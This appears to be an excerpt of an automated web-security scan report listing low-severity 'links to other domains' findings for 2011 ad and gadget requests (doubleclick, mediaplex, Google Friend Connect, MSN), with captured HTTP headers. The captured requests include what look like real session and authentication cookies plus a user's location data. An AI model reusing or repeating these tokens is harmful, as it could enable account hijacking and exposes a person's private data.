GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=250&slotname=6980537247&w=300&lmt=1304752201&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2Fby-category%2FCruising&dt=1304734201371&bpp=4&shv=r20110427&jsv=r20110427&correlator=1304734201376&frm=0&adk=1325892488&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=2039250671&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1066&bih=968&eid=33895150&fu=0&ifi=1&dtd=8&xpc=mx2DOeDKKi&p=http%3A//allatsea.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:10:04 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4493

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/by-category/Cruising%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3Dwww.Reputation.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEU8PBmiGDGIvGXugCHCwADInQPfw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
24.33. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=125&slotname=8399079020&w=125&lmt=1304752228&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2Fdirectclassifieds.php%3FmenuCategories%3D8&dt=1304734228445&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=6980537247&correlator=1304734228437&frm=0&adk=539767575&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=1066810904&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&eid=33895150&ref=http%3A%2F%2Fallatsea.net%2Fsubscribe.htm&fu=0&ifi=2&dtd=13&xpc=SLzkQZURDd&p=http%3A//allatsea.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:10:40 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 11045

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/directclassifieds.php%253FmenuCategories%253D8%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26gl%3DUS&amp;usg=AFQjCNFoneLyMqhhuWWf4klCnpBkoWAFmA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.34. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=125&slotname=8399079020&w=125&lmt=1304752206&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2Fby-category%2FDeep_Sea_Fishing&dt=1304734206940&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=6980537247&correlator=1304734205671&frm=0&adk=539767575&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=1678263349&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&eid=36813005&fu=0&ifi=2&dtd=27&xpc=ba1q6pk7xY&p=http%3A//allatsea.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 06 May 2011 21:10:09 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 11025

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.allatsea.net/by-category/Deep_Sea_Fishing%26hl%3Den%26client%3Dca-pub-9585000347357330%26adU%3Ddiscoveramerica.com/DailyGetaways%26adT%3DDiscounted%2BPrices%26gl%3DUS&amp;usg=AFQjCNFqhw0mIOdSGZx0u62UYl3fMTKXIQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.35. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093&mpt=5423093&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/3/0/%2a/b%3B241006849%3B0-0%3B1%3B37579671%3B4307-300/250%3B42070593/42088380/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:04 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 4186
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://ad.doubleclick.net/click;h=v8/3b00/3/0/*/b;241006849;0-0;1;37579671;4307-300/250;42070593/42088380/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-1?mpt=5423093" target="_blank"><img src="http://img-cdn.mediaplex.com/0/16228/124632/300x250_Patch.gif" width="300" height="250" border="0" alt="">
...[SNIP]...
24.36. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D570139&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:50:14 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 4168
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-0?mpt=570139" target="_blank"><img src="http://img-cdn.mediaplex.com/0/16228/124632/728x90_Patch.gif" width="728" height="90" border="0" alt="">
...[SNIP]...
24.37. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/gadgets/ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/recommended_pages.xml&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&communityId=14672211859858017590&caller=http://allatsea.net/by-category/Cruising HTTP/1.1
Host: iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Expires: Fri, 06 May 2011 21:15:07 GMT
Cache-Control: private,max-age=300
Date: Fri, 06 May 2011 21:10:07 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 150435

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><script>(function(){var a=window;function b(g){this.t={};this.tick=function(h,i,c){c=
...[SNIP]...
</script><link href="http://www.google.com/friendconnect/styles/gadgets-ltr.css?d=0.558.7" rel="stylesheet" type="text/css"><style type="text/css">
...[SNIP]...
<div id="recommend-it-tpl">
<img align="absbottom" class="fc-rpages-icon fc-rpages-default-icon" height="21" jsdisplay="buttonIcon == &#39;default&#39;" src="http://www.google.com/friendconnect/scs/images/recommendIcon.gif" width="21">

<img align="absbottom" class="fc-rpages-icon" height="21" jsdisplay="buttonIcon == &#39;heart&#39;" src="http://www.google.com/friendconnect/scs/images/heartIcon.gif" width="21">

<span jsdisplay="isRecommended">
...[SNIP]...
<a class="fc-rpages-delete-link" href="javascript:void(0);" jseval="handle(this,trashClick)">
<img class="fc-rpages-delete" src="http://www.google.com/friendconnect/scs/images/trash.gif">
</a>
...[SNIP]...
24.38. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/gadgets/ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/newsletterSubscribe.xml&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&up_newsletterHeadlineText=Subscribe+to+All+At+Sea!&up_newsletterStandardText=Get+updates+of+our+latest+content&communityId=14672211859858017590&caller=http://allatsea.net/subscribe.htm HTTP/1.1
Host: k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Expires: Fri, 06 May 2011 21:18:09 GMT
Cache-Control: private,max-age=300
Date: Fri, 06 May 2011 21:13:09 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 139143

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><script>(function(){var a=window;function b(g){this.t={};this.tick=function(h,i,c){c=
...[SNIP]...
</style><link href="http://www.google.com/friendconnect/styles/gadgets-ltr.css?d=0.558.7" rel="stylesheet" type="text/css">


</head>
...[SNIP]...
24.39. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xml&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&communityId=14672211859858017590&caller=http://allatsea.net/ HTTP/1.1
Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Expires: Fri, 06 May 2011 21:11:47 GMT
Cache-Control: private,max-age=300
Date: Fri, 06 May 2011 21:06:47 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 191499

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><script>(function(){var a=window;function b(g){this.t={};this.tick=function(h,i,c){c=
...[SNIP]...
</style><link href="http://www.google.com/friendconnect/styles/gadgets-ltr.css?d=0.558.7" rel="stylesheet" type="text/css">


</head>
...[SNIP]...
<span class="fc-on-other-site" jsdisplay="siteTitle">
&nbsp;<img class="delete-button" jsdisplay="typeof($this.deleteHandler) != &#39;undefined&#39; &amp;&amp; $this.deleteHandler != null" jsvalues="$h:handle(this, $this.deleteHandler);alt:MSG_DELETE_THIS;title:MSG_DELETE_THIS" src="http://www.google.com/friendconnect/scs/images/trash.gif">
</span>
...[SNIP]...
d(0);" jsselect="person" jsvalues="$h:handle(this,&#39;goToInviteFriend&#39;);.className:(isCanvasMode() ? &#39;fc-default-link fc-default-link-canvas&#39; : &#39;fc-default-link&#39;)">
<img class="fc-plus-pic" src="http://www.google.com/friendconnect/scs/images/plus.gif">
<span jscontent="MSG_ADD_AS_FRIEND">
...[SNIP]...
id(0);" jsselect="person" jsvalues="$h:handle(this,&#39;sendMessageDialog&#39;);.className:(isCanvasMode() ? &#39;fc-default-link fc-default-link-canvas&#39; : &#39;fc-default-link&#39;)">
<img class="fc-envelope-pic" src="http://www.google.com/friendconnect/scs/images/smallEnvelope.jpg">
<span jscontent="MSG_SEND_MESSAGE">
...[SNIP]...
<a class="fc-faded-link" href="javascript:void(0);" jsvalues="$h:handle(this,&#39;goToEditProfile&#39;)">
<img class="fc-edit-pic" src="http://www.google.com/friendconnect/scs/images/fc-edit.png">
<span jscontent="MSG_EDIT_PROFILE">
...[SNIP]...
<a class="fc-faded-link" href="javascript:void(0);" jsselect="person" jsvalues="$h:handle(this,&#39;goToBlockMember&#39;)">
<img class="fc-do-not-enter-pic" src="http://www.google.com/friendconnect/scs/images/do-not-enter.gif">
<span jscontent="MSG_BLOCK_USER">
...[SNIP]...
<a class="fc-faded-link-small" href="javascript:void(0);" jsselect="person" jsvalues="$h:handle(this,&#39;unblockUser&#39;)">
<img class="fc-plus-pic" src="http://www.google.com/friendconnect/scs/images/unblock.gif">
<span jscontent="MSG_UNBLOCK_USER">
...[SNIP]...
<td valign="top"><img src="http://www.google.com/friendconnect/scs/images/smallEnvelope.jpg"></td>
...[SNIP]...
24.40. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=SPTSA3&AP=1090 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC07=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; FC05=FB=AgEAtw4P67gB; FC01=FB=AgEAuQ5ZB8gB; FC06=FB=AgEAvQ6Q8uwB; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC08=FB=AgEAvw4O/vgB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MSNRPSAuth=FAASARTFnW1j7R/2XIZB3mHe3d77E4hN8gNmAAAEgAAACBXYMoVREhyX0ADLEJLRiPILXfTnhyCvz9Go%2BL7ambo5dBf6RPTXNt11NoFy1AJuaoT0T2TxOAfGJcKG/wWHoMkWH3wqP/QN4jo1m7%2BNAdM3RHhQe8kiYltNKWPKkGejQZdl3uqmHRAAJQRYkMgp%2Bk0igKH1uU7%2BaR1w286L%2BYfi4CaaklOll/V2B7ivbPIflLPVJp/6vrubl9M4NrNx0QrX2G/gGs2ld4fHZkFuMyfd4%2BjMWtYCICZPYlmSFBwzjujFs8NWYS3WQmeL0gTh5CIQsx9kx17vsdPAFADz38T8NSgH2c2NxW8mM2p59qrjpw%3D%3D; MSNRPSShare=1; MSPAuth=9ZS6z9CnTHW6nQVLn69F5g6Kq1ZGc3ZrwOlg*roxIBmxDiYnXGxD!lZbQ3NaDTBICmclo916XIZmzbCt239s9!ofrljHmXARncTrTBhSXE5HYpO4CvzewYRcgboqrT6F63; MSPProf=9ng3Qj0dWDBgjckYbAydF4TeuPZIEqjRUAIQsjQC8bD7wSE7YcBkffxuAYa*5hFyfmsZw0z5iSAqmoJrRbBKbwEfaqa8N2YTDV8M*Hh!5oVibmYhBosajfilIcF947gI11Ahkt99*Z2rSzijfj!a0ur7*saIB9TO0cdTX34uzM5!JKmnlQDSL8Hw$$; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b2c&W=1; NAP=V=1.9&E=ad2&C=TyTLJiYHPCovH3I7fPvWG8WWgxnFbQpamGFpO0Bcx8odiqKu6YYGUQ&W=1; Sample=37; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 841
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8265690-T8277539-C81000000000044034
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 19:30:46 GMT
Content-Length: 841


//<![CDATA[
function getRADIds() { return{"adid":"81000000000044034","pid":"8265690","targetid":"8277539"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 160, 600);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0004C/81000000000044034.1??PID=8265690&amp;UIT=A-&amp;TargetID=8277539&amp;AN=170524946&amp;PG=SPTSA3&amp;ASID=2a25e884b2d94202aaf6d17d9b34153d" target="_blank"><img src="http://ads2.msads.net/CIS/50/000/000/000/002/876.jpg" width="160" height="600" alt="Click Here!" border="0" /></a>
...[SNIP]...
24.41. http://recruiting.scout.com/Legacy/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /Legacy/a.z

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Legacy/a.z?s=143&p=26&cfg=22&fromprefetch=1 HTTP/1.1
Host: recruiting.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utmz=153805115.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=153805115.1232119317.1303509265.1303509265.1303516031.2; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304731683.1304736111.6; __utmc=202704078; __utmb=202704078.1.10.1304736111

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 21:42:14 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 21:52:13 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
